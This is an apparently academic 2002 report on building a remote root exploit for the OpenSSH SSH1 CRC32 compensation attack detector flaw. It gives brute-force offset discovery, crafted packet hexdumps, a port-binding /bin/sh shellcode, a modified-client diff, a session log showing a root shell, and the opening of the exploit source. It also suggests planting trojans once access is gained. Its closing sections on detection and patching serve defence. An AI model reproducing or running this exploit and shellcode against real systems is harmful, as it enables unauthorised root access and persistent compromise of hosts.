We used Openssh-2.2.0p1 as the victim's ssh daemon. This implementation of sshd (protocol version less than 2) was known to be vulnerable to our attack and it was easily available over the Internet. We modified the sshd for the development phase by having it print out important frame and stack information. The stack location information was helpful in fine-tuning function return address overwriting. BSS memory section's location information gave directions to finding our shellcode in memory.
After the exploit application was finished, we restored the sshd to its original state.
ssh client source code
Openssh-2.3.0p1 was used as a platform for our exploit, since we found one occasion where a similar exploit was possible with this version. However, as far as we know, any other ssh client may have been used in our exploit.
In order to have the client to send the encrypted ssh packets of our choice, we modified the client to send exactly those cipherblocks we asked it to. Usually the client takes plaintext from the user and sends its ciphertext over the network. This time we wanted to send specific ciphertext and actually we did not care about the corresponding plaintext.
We let the client do key exchange in the ordinary fashion, but when the ciphering starts and user authentication is about to begin, we send malicious packets to the victim.
Teso/Shack logs & network traffic
We acquired a similar exploit from 'Team Teso', which was successful in running the required shellcode, but only with very good initial guesses for stack and bss section locations. This implementation was very inefficient.
We found another exploit called 'shack' which is related to 'anti.security.is'. This exploit is assumed to be proprietary in the first place and for sale, but it slipped to public. Only the binary of this exploit was available. Although the logs it generates gave us hints what it was doing. Some references call this exploit the Teso-exploit, but we think that it only uses the teso-method to find a critical parameter run-time.
The 'shack' exploit was a black box to us and we conducted extended analysis of the network traffic it generated.
Shellcode
We acquired a shellcode from Anathema anathema@hack.co.za, which was used in our implementation. See appendix 7.1. This implementation will create a socket for enabling remote access, bind the socket to the process, accept connections to port 36864, and execute a shell.
4.3 Process
We created an exploit application for handling the brute force methodology of the exploit. It uses the modified ssh client to try connections to the victim, with certain intelligence. The application generates malicious packets for the victim and lets the modified ssh client send them. Depending on the output of the server, the application makes conclusions on the effects of the malicious packet. The server may return such messages as 'corrupt bytes in packet' or 'CRC32 compensation attack detected'. Although, the most frequent response is a mere connection close since the server crashes often (SEGV). These output strings are analysed and used as directions for next malicious packets. It is very typical that the connection closes after the first cipherpacket, since it is somehow malformed. For example our exploit doesn't consider CRC checksums and therefore the sshd closes the connection. Although, a lot can happen before the connection is closed…
The process itself consists of four phases, of who the last one attempts to run the shellcode.
4.3.1 Reverse Engineering
The shack exploit surprised us with its capability to find out critical addresses concerning the exploit. A utility program called 'tcpflow' and gnu debugger were used to reverse engineer the operation of the shack exploit. Tcpflow is a program which captures entire tcp connections combining all relevant packets together. This tool was crucial in succeeding to make a working exploit.
Hexdump was used to interpret the data in readable format:
hexdump -e '"%07.7_ax " 16/1 "%02x " "n"' -s 0xb8 192.168.001.010.03164-192.168.001.001.02222 | less
Gdb was used to diagnose various erroneous states and in confirming memory address calculations.
4.3.2 Packet sending
We modified the packet.c source file in such a way that the client sends dedicated cipherpackets we ask it to. Packet.c includes a function definition for packet_write_poll() which is used to write the ciphertext to outgoing buffer. Our modified implementation reads the desired cipherpacket from a file '/tmp/exploit_packet' and sends it. These packet files are written by our exploit application.
4.3.3 Finding distance to 'buf'
The first thing that can be calculated in the server's memory addresses is the distance from variable h to variable buf (according to detect_attack() function). The following format of cipherpacket was used to search for the distance from h to buf:
Extract from packet #1:
00000b8 00 00 00 00 ff ff ff ff 00 00 00 01 ff ff ff ff
00000c8 00 00 00 04 ff ff ff ff 00 00 00 05 ff ff ff ff
00000d8 00 00 00 08 ff ff ff ff 00 00 00 09 ff ff ff ff
00000e8 00 00 00 0c ff ff ff ff 00 00 00 0d ff ff ff ff
00000f8 00 00 00 10 ff ff ff ff 00 00 00 11 ff ff ff ff
...
This is the first type of packet that our exploit uses. It consists of 184-byte header and 102400 bytes 8-byte blocks that consist of a small 32-bit number and 0xFFFF. Consecutive packets increase the small numbers. When sshd processes this kind of packet, it will set i to first 32-bits of each 8-byte block (#3 in detect_attack()). It tries to read memory at h[i] on the same line. This read will cause SEGV if i is such an offset to h that the address is not readable. SEGV also happens if buf + h[i] * 8 is unreadable. With this kind of packet, the sshd will practically always SEGV at #4 in detect_attack() when done thousands of times in a row.
The trick is to have i[small number] point always to 0xFFFF. This is same as 'HASH_UNUSED' and the memory read is skipped. The packet contains 12800 small numbers that make h[i] point to a loose array of approximately half the length of the packet. When the first small number in the packet points to the first half of the buffer, each h[i] will have value 0xFF and the memory read is skipped. It would be extremely rare to find such an array in memory in a place other than buf. Binary search is used to find the smallest small number that will not cause SEGV. A hit to buf will cause 'corrupt bytes' response from the sshd.
In the first phase, the small number is increased by packet_length / 4 so that its pointed address h[small number] points packet_length / 2 forward on each packet. This is a fast scan through the memory to find appriximate distance from h to buf. The second phase is a binary search which will find the distance accurately and reliably.
4.3.4 Finding distance to kernel space
The next memory address to find is h-to-kernel_space distance. The reason why we are interested in this distance is that the stack frame of the current process is close to the kernel space i.e. somewhere below address 0xC0000000. The stack frame is of interest since the saved EIP of the parent function is there. See Chapter 2.3. In this phase, we use a dedicated type of ssh-cipherpacket to test if h[i] is readable (#3 in detect_attack()) and small enough that 'buf + h[i] * SSH_BLOCKSIZE' is readable (#4 in detect_attack()). The stack area contains such small numbers. This packet type uses this test only once - at 0x5BFC4280 in the packet hexdump extract below. We want to test one address only and exit the process as quickly as we can. The pattern of '0x00002860 0100FFFF's is a tell-tale sign for the sshd that this packet uses CRC32 compensation attack. We want the sshd to think like this in order to close the connection right away and speed up the process. On the other hand we can now distinguish between SEGV while processing the first 8-byte ssh block and CRC32 compensation attack detected while processing the second block. This will let the attacker know if the sshd could read memory at 0x5BFC4280.
The packets our exploit sends are filled with the quess for h-to-kernel_space offset (16-bit), although it is required only in the very beginning of the packet.
000000b8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000000c8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
000000d8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
000000e8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000000f8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000108 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
00000118 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000128 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000138 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000148 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000158 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000168 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
00000178 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000188 00 00 28 60 01 00 ff ff 5b fc 42 80 73 50 ff ff ; ..(`..ÿÿ[üB€sPÿÿ
00000198 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
000001a8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000001b8 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
000001c8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
...
Our exploit is a bit simplified version of the 'shack' implementation in this phase. Shack uses three different packet types to hunt down the h-to-stack distance with binary search. Our exploit only finds the distance from h to kernel_space. Although the difference is usually quite small and we can compensate the error in the shellcode phase. Our current implementation brute forces the distance beginning from an educated quess. It starts testing addresses way deep in the kernel space and comes down gradually and finds the lower bound of the kernel space. With this distance, we can calculate the addresses for h and buf.
4.3.4 Sending shellcode
The heart of our exploit is to send the packet that finalizes the breach to the victim host. This packet combines basically three important functions. It rewrites the saved EIP in the stack frame, exits the attack_detect() function call as quickly as possible, and when returned, executes the shellcode that lets the attacker telnet to the victim and control a root shell. The base of this packet is NOP instruction (0x90 on Intel x86 architecture) since it occupies most of this packet. Other contents are inserted where necessary. The following tcpdump extract shows what this ssh cipherpacket consists of.
000000b8 00 00 28 5d 73 50 ff ff 00 00 28 61 73 50 ff ff ; ..(]sPyy..(asPyy
000000c8 00 00 28 65 73 50 ff ff 00 00 28 69 73 50 ff ff ; ..(esPyy..(isPyy
000000d8 00 00 28 6d 73 50 ff ff 00 00 28 71 73 50 ff ff ; ..(msPyy..(qsPyy
000000e8 00 00 28 75 73 50 ff ff 00 00 28 79 73 50 ff ff ; ..(usPyy..(ysPyy
000000f8 00 00 28 7d 73 50 ff ff 00 00 28 81 73 50 ff ff ; ..(}sPyy..(sPyy
…
000040c8 00 00 48 65 73 50 ff ff 00 00 48 69 73 50 ff ff ; ..HesPyy..HisPyy
000040d8 00 00 48 6d 73 50 ff ff 00 00 48 71 73 50 ff ff ; ..HmsPyy..HqsPyy
000040e8 5b fc 2f 7f 73 50 ff ff 00 00 48 79 73 50 ff ff ; [ü/sPyy..HysPyy
000040f8 5b fc 2f 7f 73 50 ff ff 00 00 48 80 09 08 90 90 ; [ü/sPyy..H€..
00004108 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004118 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004128 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
00004138 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004148 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
00004158 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
00004168 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
00004178 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
00004188 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004198 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041a8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
000041b8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041c8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041d8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
000041e8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041f8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
00004208 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
…
00019028 eb 72 5e 29 c0 89 46 10 40 89 c3 89 46 0c 40 89 ; ër^)À‰F.@‰Ã‰F.@‰
00019038 46 08 8d 4e 08 b0 66 cd 80 43 c6 46 10 10 66 89 ; F.N.°fÍ€CÆF..f‰
00019048 5e 14 88 46 08 29 c0 89 c2 89 46 18 b0 90 66 89 ; ^.ˆF.)À‰Â‰F.°f‰
00019058 46 16 8d 4e 14 89 4e 0c 8d 4e 08 b0 66 cd 80 89 ; F.N.‰N.N.°fÍ€‰
00019068 5e 0c 43 43 b0 66 cd 80 89 56 0c 89 56 10 b0 66 ; ^.CC°fÍ€‰V.‰V.°f
00019078 43 cd 80 86 c3 b0 3f 29 c9 cd 80 b0 3f 41 cd 80 ; CÍ€†Ã°?)ÉÍ€°?AÍ€
00019088 b0 3f 41 cd 80 88 56 07 89 76 0c 87 f3 8d 4b 0c ; °?AÍ€ˆV.‰v.‡óK.
00019098 b0 0b cd 80 e8 89 ff ff ff 2f 62 69 6e 2f 73 68 ; °.Í€è‰yyy/bin/sh
000190a8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
The first part of the packet is designed so that the for loop (before #3 in detect_attack()) increases the value of j, See Chapter 3 for more information. These blocks are filled with offsets for h to point to the following 0xFF's. This will make the for loop run quickly and smoothly until j is what we want it to be. We want j to be that value which will be written to saved_EIP. The most significant word (16-bit) of the saved_EIP is usually around 0x807. The least significant word can be whatever. Since detect_attack() will try to read memory at (buf + h[i] * SSH_BLOCKSIZE) at #4, the value we write on top of the old word in the memory cannot be very large. This means that we can only write small numbers to memory with detect_attack(). This is a reason for only writing the most significant byte of the saved_EIP, which is only about 0x807 and makes (buf + h[i] * SSH_BLOCKSIZE) readable at #4. However, this is no problem for our exploit, because our NOP sled is over 0xFFFF long and it doesn't matter what the LSW of EIP is if the MSW is correct.
When j is the desired saved_EIP_MSW (guessed), we set i to be the h-to-saved_EIP offset (guessed). Now detect_attack() will have to reach point #5 to write the new EIP with correct values of i and j. This is only possible when if clause at #4 is true and the CRC will be checked with check_crc(). This check will not generate 'CRC32 compensation attack detected' message since there is no attack pattern. On the contrary, the crc_check() will pass and the for loop is broken out of. Now h[i] will be j and detect_attack() has been exploited.
One more thing: The comparison at #4 will only pass if the block at c is the same as (buf + h[i] * SSH_BLOCKSIZE). j will be the target saved_EIP_MSW (such as 0x807) and c is (buf + j * SSH_BLOCKSIZE), so we need to fix the contents at (buf + h[i] * SSH_BLOCKSIZE) to be the same as at c. h[i] hopefully points to the MSW of saved_EIP and has a value that is the real return address for detect_attack() at this point. This is usually something like 0x805. This means that the block number 0x805 in our packet must have the same content as the block number 0x807 at hand. Therefore we need to have an exact copy of the saved_EIP_MSW writing block at 0x807. In the tcpdump above, these two blocks can be seen at 0x40E8 and at 0x40F8.
Once again, these blocks are followed by the CRC32 compensation attack pattern for exiting the outer for loop as quickly as possible. This pattern consists of 15 blocks that each include a h-to-buffer offset that points to the first block of this pattern (0x809, GET_CRC32() order). When detect_attack() processes the block number 0x809, it detects the attack and returns. By a miracle, the return address is now 0x807 and the process execution jumps to a new location, hopefully the NOP sled in the buffer.
4.3.5 Executing shellcode
Once the EIP lands on the NOP sled in buf, the execution will slide down the sled to the shellcode, where the attackers code will be executed with root privileges. The system call to execve in the shellcode will capture the ongoing process which will be bound to a tcp port.
The shellcode itself is 128 bytes long including the string that is passed to execve system call. The biggest problem of the shellcode is that it will have to know the address of the string "/bin/sh" in order to pass it as an argument to the system interrupt. For this purpose, it uses a call-pop combination to write EIP to stack and then pop it from the stack. Easy as that.
Assuming now that J stands for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow would now be [1]:
Arrangement of Shellcode execution:
bottom of DDDDDDDDEEEEEEEEEEE top of
memory 89ABCDEF0123456789A memory
buffer
<------ [JSSSSSSSSSSSSSSCCss]
|^ ^|
|| ||
(1) ||_____________||
|______________| (2)
top of bottom of
stack stack
See Appendix 7.1 for details.
4.4 Using exploit
The exploit application is a command-line utility that can be run on many different platforms. In the case of Intel x86 architecture, Linux, and victim sshd version openssh-2.2.0p1, the exploit works fine with no command-line arguments whatsoever. With different platforms, some parameter need adjusting to run the exploit in sensible time span.
A user of our exploit needs:
Openssh-2.3.0 client sourcecode
packet.diff for modifying the ssh client
uxp2.c sourcecode (our exploit application)
See Appendix 7.3 for packet.diff and uxp2.c source code files.
See Appendix 7.2 for details what the exploit looks like from the attackers point of view.
After the attacker connects to the victims new open port and root shell, the sshd gives 10 minutes to run commands as root. After those minutes the sshd parent process that forks children for individual connections will close the connection in the name of a time-out. This time can be used to implant Trojan horses and other malicious programs into the victim that will for example expose passwords as they are typed in.
4.5 Advantages and Disadvantages
The advantage of the exploit is that it runs without any parameters and succeeds to run the shellcode with some non-zero probability. The application runs the shellcode quite quickly compared to some other CRC32 attack detector exploits that also require perfect guesses for addresses.
The biggest disadvantage is that the application is heavily optimized for our own hardware and software platform. The application could prompt the user for different target sshd-implementations, for example. Some memory-address distances are determined by brute-force means. Switching to binary search could make the exploit a lot quicker. The exploit could also include some sort of root kit or tools to preserve the access to the victim host.
5 Counter actions
5.1 Detecting attacks
Detecting attacks using this exploit can be done pretty easily if the host has already some active log monitor or traffic follower (e.g. snort) running.
The traffic is quite notable because this is based on bruteforcing. The count of log entries on target machine will be therefore high. The following strings could be filtered out with the log monitor:
sshd[24399]: Disconnecting: Corrupted check bytes on input.
sshd[24439]: Disconnecting: crc32 compensation attack: network attack detected
If those entries are matched many on a row, the log monitor could dynamically set the firewall to block the connections from the source ip mentioned on the logs.
The traffic monitor could either check the lengths of the packets or if the packet contains lot of NOP instructions (0x90 on Intel platforms). The length of the packets is fairly constant (about 100kB) and there are only one big packet per connection and then the connection is dropped. Snort could be configured to do this monitoring easily.
Also the normal hack detection methods can be used. For example check the integrity of binaries using some automated tool (e.g. tripwire). If the logs are kept on and sent real-time to different, secure host, then the logs should inform about something mystical because they can't be tampered.
5.2 Required actions after being attacked
If the system's security is breached:
disconnect the machine from the network immediately
disconnect also the other hosts 'near' the infected one because probably the attacker has gained root on those machines as well
notify the users of this host
start to analyze the logs with security expert and inform the police if necessary (helps you in the case where your host is used in hacking other hosts)
do NOT put the machine in a production environment without complete system reinstall
This is the same procedure that should be followed in any hack suspicion.
5.3 Preventive actions
The vulnerability is easily fixed: change the variable n from 16-bit to 32-bit or set some kind of check for packet length or the value of n.
Frankly, updating your SSH daemon to a newer, secure version is the safest bet.
If the users are willing, restrict the hosts where the users can log from. This can be done using firewall settings.
6 References
[1] Aleph One: [phrack] Smashing The Stack For Fun And Profit [online] [referenced March 20, 2002] Vol 7, Issue 49
Available from: <http://www.phrack.com/phrack/49/P49-14>
[2] blackshell@hushmail.com: [Securityfocus bugtraq: vuln-dev archive] ssh1 remote root exploit [online]. [referenced March 20, 2002] Available from: <http://online.securityfocus.com/archive/82/247801>
[3] Johnson, Michael K. Linux Memory Management Overview. In Linux documentation project [online] [referenced March 20, 2002] Available from: <http://www.linuxdoc.org/LDP/khg/HyperNews/get/memory/linuxmm.html>
[4] Visscher Paul. readelf man page [online] [referenced March 20, 2002] Available from: <http://www.gnu.org/manual/binutils-2.10.1/html_chapter/binutils_14.html>
[5] Starzetz, Paul. ssh1.crc32.txt [online article] [referenced March 20, 2002] Available from: <http://packetstorm.widexs.nl/0102-exploits/ssh1.crc32.txt>
[6] Lanza, Jeffrey P. Vulnerability Note VU#945216 [online], Carnegie Mellon Software Engineering Institute. [referenced March 20, 2002] Available from: <http://www.kb.cert.org/vuls/id/945216>
[7] SSH CRC-32 Compensation Attack Detector Vulnerability, Securiryfocus.com bugtraq list [online]. [referenced March 20, 2002] Available from: <http://online.securityfocus.com/bid/2347>
[8] Dittrich, David A. Analysis of SSH crc32 compensation attack detector exploit [online]. [referenced March 20, 2002] Available from: <http://staff.washington.edu/dittrich/misc/ssh-analysis.txt>
[9] Rafail, Jason A.; Dougherty, Chad. CERT® Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons [online] Carnegie Mellon Software Engineering Institute. [referenced March 20, 2002] Available from: <http://www.cert.org/advisories/CA-2001-35.html>
[10] Packetstorm exploit archive, Shack exploit [online] [referenced March 20, 2002] <http://packetstorm.widexs.nl/0201-exploits/cm-ssh.tgz>
[11] Incidents.org, Handler's Diary Thursday, December 13th 2001 [online] [referenced March 20, 2002] <http://www.incidents.org/diary/diary.php?id=118>
[12] Elson, Jeremy. tcpflow -- A TCP Flow Recorder [online] [referenced March 20, 2002] <http://www.circlemud.org/~jelson/software/tcpflow/>
[13] jsb4ch@hotmail.com, ANTI-prym/h4g1s portshell code [online] [referenced March 20, 2002] <http://www.cotse.com/sw/linux/portshell.txt>
[14] Heinisuo, Rami et al.: Elektronisen viittaamisen opas [online]. Jyväskylä: University of Jyväskylä, 1997 [referenced January 27, 2002] Available from: <http://lib.hut.fi/Elehdet/Elviira/ >
[15] Siegert, Martin: [linux-security] ssh1 remote root exploit [online]. Simon Fraser University, 2001 [referenced January 27, 2002] SFU's linux-security mailing list. Available from: <http://www.sfu.ca/~siegert/linux-security/msg00017.html>
[16] SSH statement regarding the vulnerability of SSH1 protocol <http://www.ssh.com/products/ssh/cert/>
[17] Possible OpenSSH DoS Attack <http://www.securityfocus.com/cgi-bin/archive.pl?id=82&start=2002-01-26&end=2002-02-01&threads=0&mid=004401c181d1$2b91adc0$0400a8c0@pi>
[18] SSH Vulnerability Scan Vulnerability to CRC32 compensation attack detector exploit <http://www.securityfocus.com/archive/1/243644> <http://staff.washington.edu/dittrich/misc/ssh-analysis.txt>
[19] Cisco Security Advisory: Multiple SSH Vulnerabilities <http://www.cisco.com/warp/public/707/SSH-multiple-pub.html>
[20] OpenSSH subject to traffic analysis <http://www.securityfocus.com/archive/1/176117/> <http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt>
[21] SSH brute forcer <http://www.securityfocus.com/archive/82/252405>
[22] blackshell tool1: SSHD vulnerability scanner <http://www.securityfocus.com/archive/82/247801>
[23] Ylönen, Tatu. The SSH (Secure Shell) Remote Login Protocol [online] [referenced March 20, 2002] <http://www.snailbook.com/docs/protocol-1.5.txt>
7 Appendices
7.1 Shellcode
/*
* Linux/x86
* TCP/36864 portshell (old, could be optimized further)
*/
char shellcode[] = /* anathema <anathema@hack.co.za> */
/* main: */
"xebx72" /* jmp callz */
/* start: */
"xebx72" /* popl %esi */
/* socket() */
"x29xc0" /* subl %eax, %eax */
"x89x46x10" /* movl %eax, 0x10(%esi) */
"x40" /* incl %eax */
"x89xc3" /* movl %eax, %ebx */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x40" /* incl %eax */
"x89x46x08" /* movl %eax, 0x08(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* bind() */
"x43" /* incl %ebx */
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */
"x88x46x08" /* movb %al, 0x08(%esi) */
"x29xc0" /* subl %eax, %eax */
"x89xc2" /* movl %eax, %edx */
"x89x46x18" /* movl %eax, 0x18(%esi) */
"xb0x90" /* movb $0x90, %al */
"x66x89x46x16" /* movw %ax, 0x16(%esi) */
"x8dx4ex14" /* leal 0x14(%esi), %ecx */
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */
"x43" /* incl %ebx */
"x43" /* incl %ebx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */
"x89x56x10" /* movl %edx, 0x10(%esi) */
"xb0x66" /* movb $0x66, %al */
"x43" /* incl %ebx */
"xcdx80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */
"xb0x3f" /* movb $0x3f, %al */
"x29xc9" /* subl %ecx, %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */
"x89x76x0c" /* movl %esi, 0x0c(%esi) */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */
"xb0x0b" /* movb $0x0b, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8x89xffxffxff" /* call start */
"/bin/sh";
7.2 Exploit usage
[root@localhost exploit]# ../uxp2
Finding estimate for h..buf distance
Testing h..buf offset: 0x00000000 B NOT FOUND (SEQV)
Testing h..buf offset: 0x0000c800 B FOUND (Corrupt bytes)
Finding exact h..buf distance
Testing h..buf offset: 0x00004800 B (prev. step=0x00008000h) NOT FOUND. Increasing by 0x00002000
Testing h..buf offset: 0x00008800 B (prev. step=0x00004000h) FOUND. Decreasing by 0x00001000
Testing h..buf offset: 0x00006800 B (prev. step=0x00002000h) FOUND. Decreasing by 0x00000800
Testing h..buf offset: 0x00005800 B (prev. step=0x00001000h) FOUND. Decreasing by 0x00000400
Testing h..buf offset: 0x00005000 B (prev. step=0x00000800h) NOT FOUND. Increasing by 0x00000200
Testing h..buf offset: 0x00005400 B (prev. step=0x00000400h) FOUND. Decreasing by 0x00000100
Testing h..buf offset: 0x00005200 B (prev. step=0x00000200h) FOUND. Decreasing by 0x00000080
Testing h..buf offset: 0x00005100 B (prev. step=0x00000100h) FOUND. Decreasing by 0x00000040
Testing h..buf offset: 0x00005080 B (prev. step=0x00000080h) NOT FOUND. Increasing by 0x00000020
Testing h..buf offset: 0x000050c0 B (prev. step=0x00000040h) FOUND. Decreasing by 0x00000010
Testing h..buf offset: 0x000050a0 B (prev. step=0x00000020h) NOT FOUND. Increasing by 0x00000008
Testing h..buf offset: 0x000050b0 B (prev. step=0x00000010h) NOT FOUND. Increasing by 0x00000004
Testing h..buf offset: 0x000050b8 B (prev. step=0x00000008h) FOUND. Decreasing by 0x00000002
Found exact distance: 0x000050b4
Finding lower kernel area boundary
Testing h..boundary offset 0xb7f88500 NOT FOUND. (SEQV)
Testing h..boundary offset 0xb7f884fc NOT FOUND. (SEQV)
Testing h..boundary offset 0xb7f884f8 FOUND. (CRC32 Attack Detected)
Trying to run shellcode. If output stalls, telnet to 192.168.1.1:36864
Trying shellcode/ (eip_MSW@0xbfffda00 pres_MSW=0x0806 targ_MSW=0x0808)
[1]+ Stopped ../uxp2
[root@localhost exploit]# kill %1
[1]+ Stopped ../uxp2
[root@localhost exploit]#
[root@localhost exploit]# telnet 192.168.1.1 32864
Trying 192.168.1.1...
telnet: connect to address 192.168.1.1: Connection refused
[root@localhost exploit]# telnet 192.168.1.1 36864
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
: command not found
ls -l;
total 480
drwxr-xr-x 2 root root 4096 Mar 8 18:30 bin
drwxr-xr-x 3 root root 4096 Feb 28 22:26 boot
-rw------- 1 root root 520192 Mar 10 23:08 core
drwxr-xr-x 16 root root 77824 Mar 12 21:21 dev
drwxr-xr-x 60 root root 8192 Mar 19 19:24 etc
drwxr-xr-x 10 root root 4096 Mar 15 00:04 home
drwxr-xr-x 2 root root 4096 Jun 21 2001 initrd
drwxr-xr-x 7 root root 4096 Mar 4 15:45 lib
drwxr-xr-x 2 root root 16384 Sep 2 2001 lost+found
drwxr-xr-x 2 root root 0 Feb 28 22:32 misc
drwxr-xr-x 4 root root 4096 Nov 23 17:13 mnt
lrwxrwxrwx 1 root root 13 Jan 20 15:09 mp3 -> /mnt/hdd1/MP3
drwxr-xr-x 2 root root 4096 Aug 23 1999 opt
dr-xr-xr-x 180 root root 0 Feb 28 22:32 proc
drwxr-x--- 29 root root 4096 Mar 19 18:55 root
drwxr-xr-x 2 root root 4096 Mar 8 18:31 sbin
lrwxrwxrwx 1 root root 18 Nov 20 23:12 scratch -> /mnt/hdc1/scratch/
drwxrwxrwt 13 root root 4096 Mar 19 19:10 tmp
drwxr-xr-x 17 root root 4096 Feb 5 18:11 usr
drwxr-xr-x 22 root root 4096 Sep 2 2001 var
lrwxrwxrwx 1 root root 14 Nov 16 19:48 www -> /mnt/hdc1/www/
: command not found
exit;
Connection closed by foreign host.
[root@localhost exploit]#
7.3 Source code files for the exploit
7.3.1 packet.diff
Download packet.diff
--- packet.c Sat Oct 14 08:23:12 2000
+++ packet_modified.c Tue Mar 19 20:24:25 2002
@@ -125,6 +125,9 @@
/* Session key information for Encryption and MAC */
Kex *kex = NULL;
+/* pekka.korpinen@hut.fi, kalle.lyytikainen@hut.fi */
+/* HACK - Packet Number */
+int count = 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +464,9 @@
unsigned int checksum;
u_int32_t rand = 0;
+ /* HACK - Count sent packets */
+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
@@ -1172,7 +1178,32 @@
void
packet_write_poll()
{
- int len = buffer_len(&output);
+ int len;
+
+ /* --- HACK START --- */
+ FILE *f;
+ unsigned long sz;
+ char buf[50], *ptr, packet[270000];
+
+ if (count == 2)
+ {
+ debug("reading exploit packet from /tmp/exploit_packet");
+ f = fopen("/tmp/exploit_packet","r");
+ fread(buf, 1, 4, f);
+ sz = GET_32BIT(&buf[0])+4;
+ debug("packet length = %un", sz);
+
+ buffer_clear(&output);
+ buffer_append(&output, packet, sz);
+ ptr = buffer_ptr(&output);
+ fread(ptr, 1, sz, f);
+ fclose(f);
+
+ count++;
+ }
+ /* --- HACK END --- */
+
+ len = buffer_len(&output);
if (len > 0) {
len = write(connection_out, buffer_ptr(&output), len);
if (len <= 0) {
7.3.2 uxp2.c
Download uxp2.c
/*
THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
Exploit code for using the modified ssh
2002-03-20
Authors:
Pekka Korpinen, pekka.korpinen@hut.fi / Helsinki University of Technology
Kalle Lyytikäinen, kalle.lyytikainen@hut.fi / Helsinki University of Technology
This code is based on the reverse-engineering work of the
shack implementation. Shellcode is by anathema.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
// Target host
char host[] = "192.168.1.1";
// Target port
int port = 2222;
// Packet length (don't touch)
unsigned long packet_length = 102400;
// The packet buffer
char *buffer = NULL;
/*
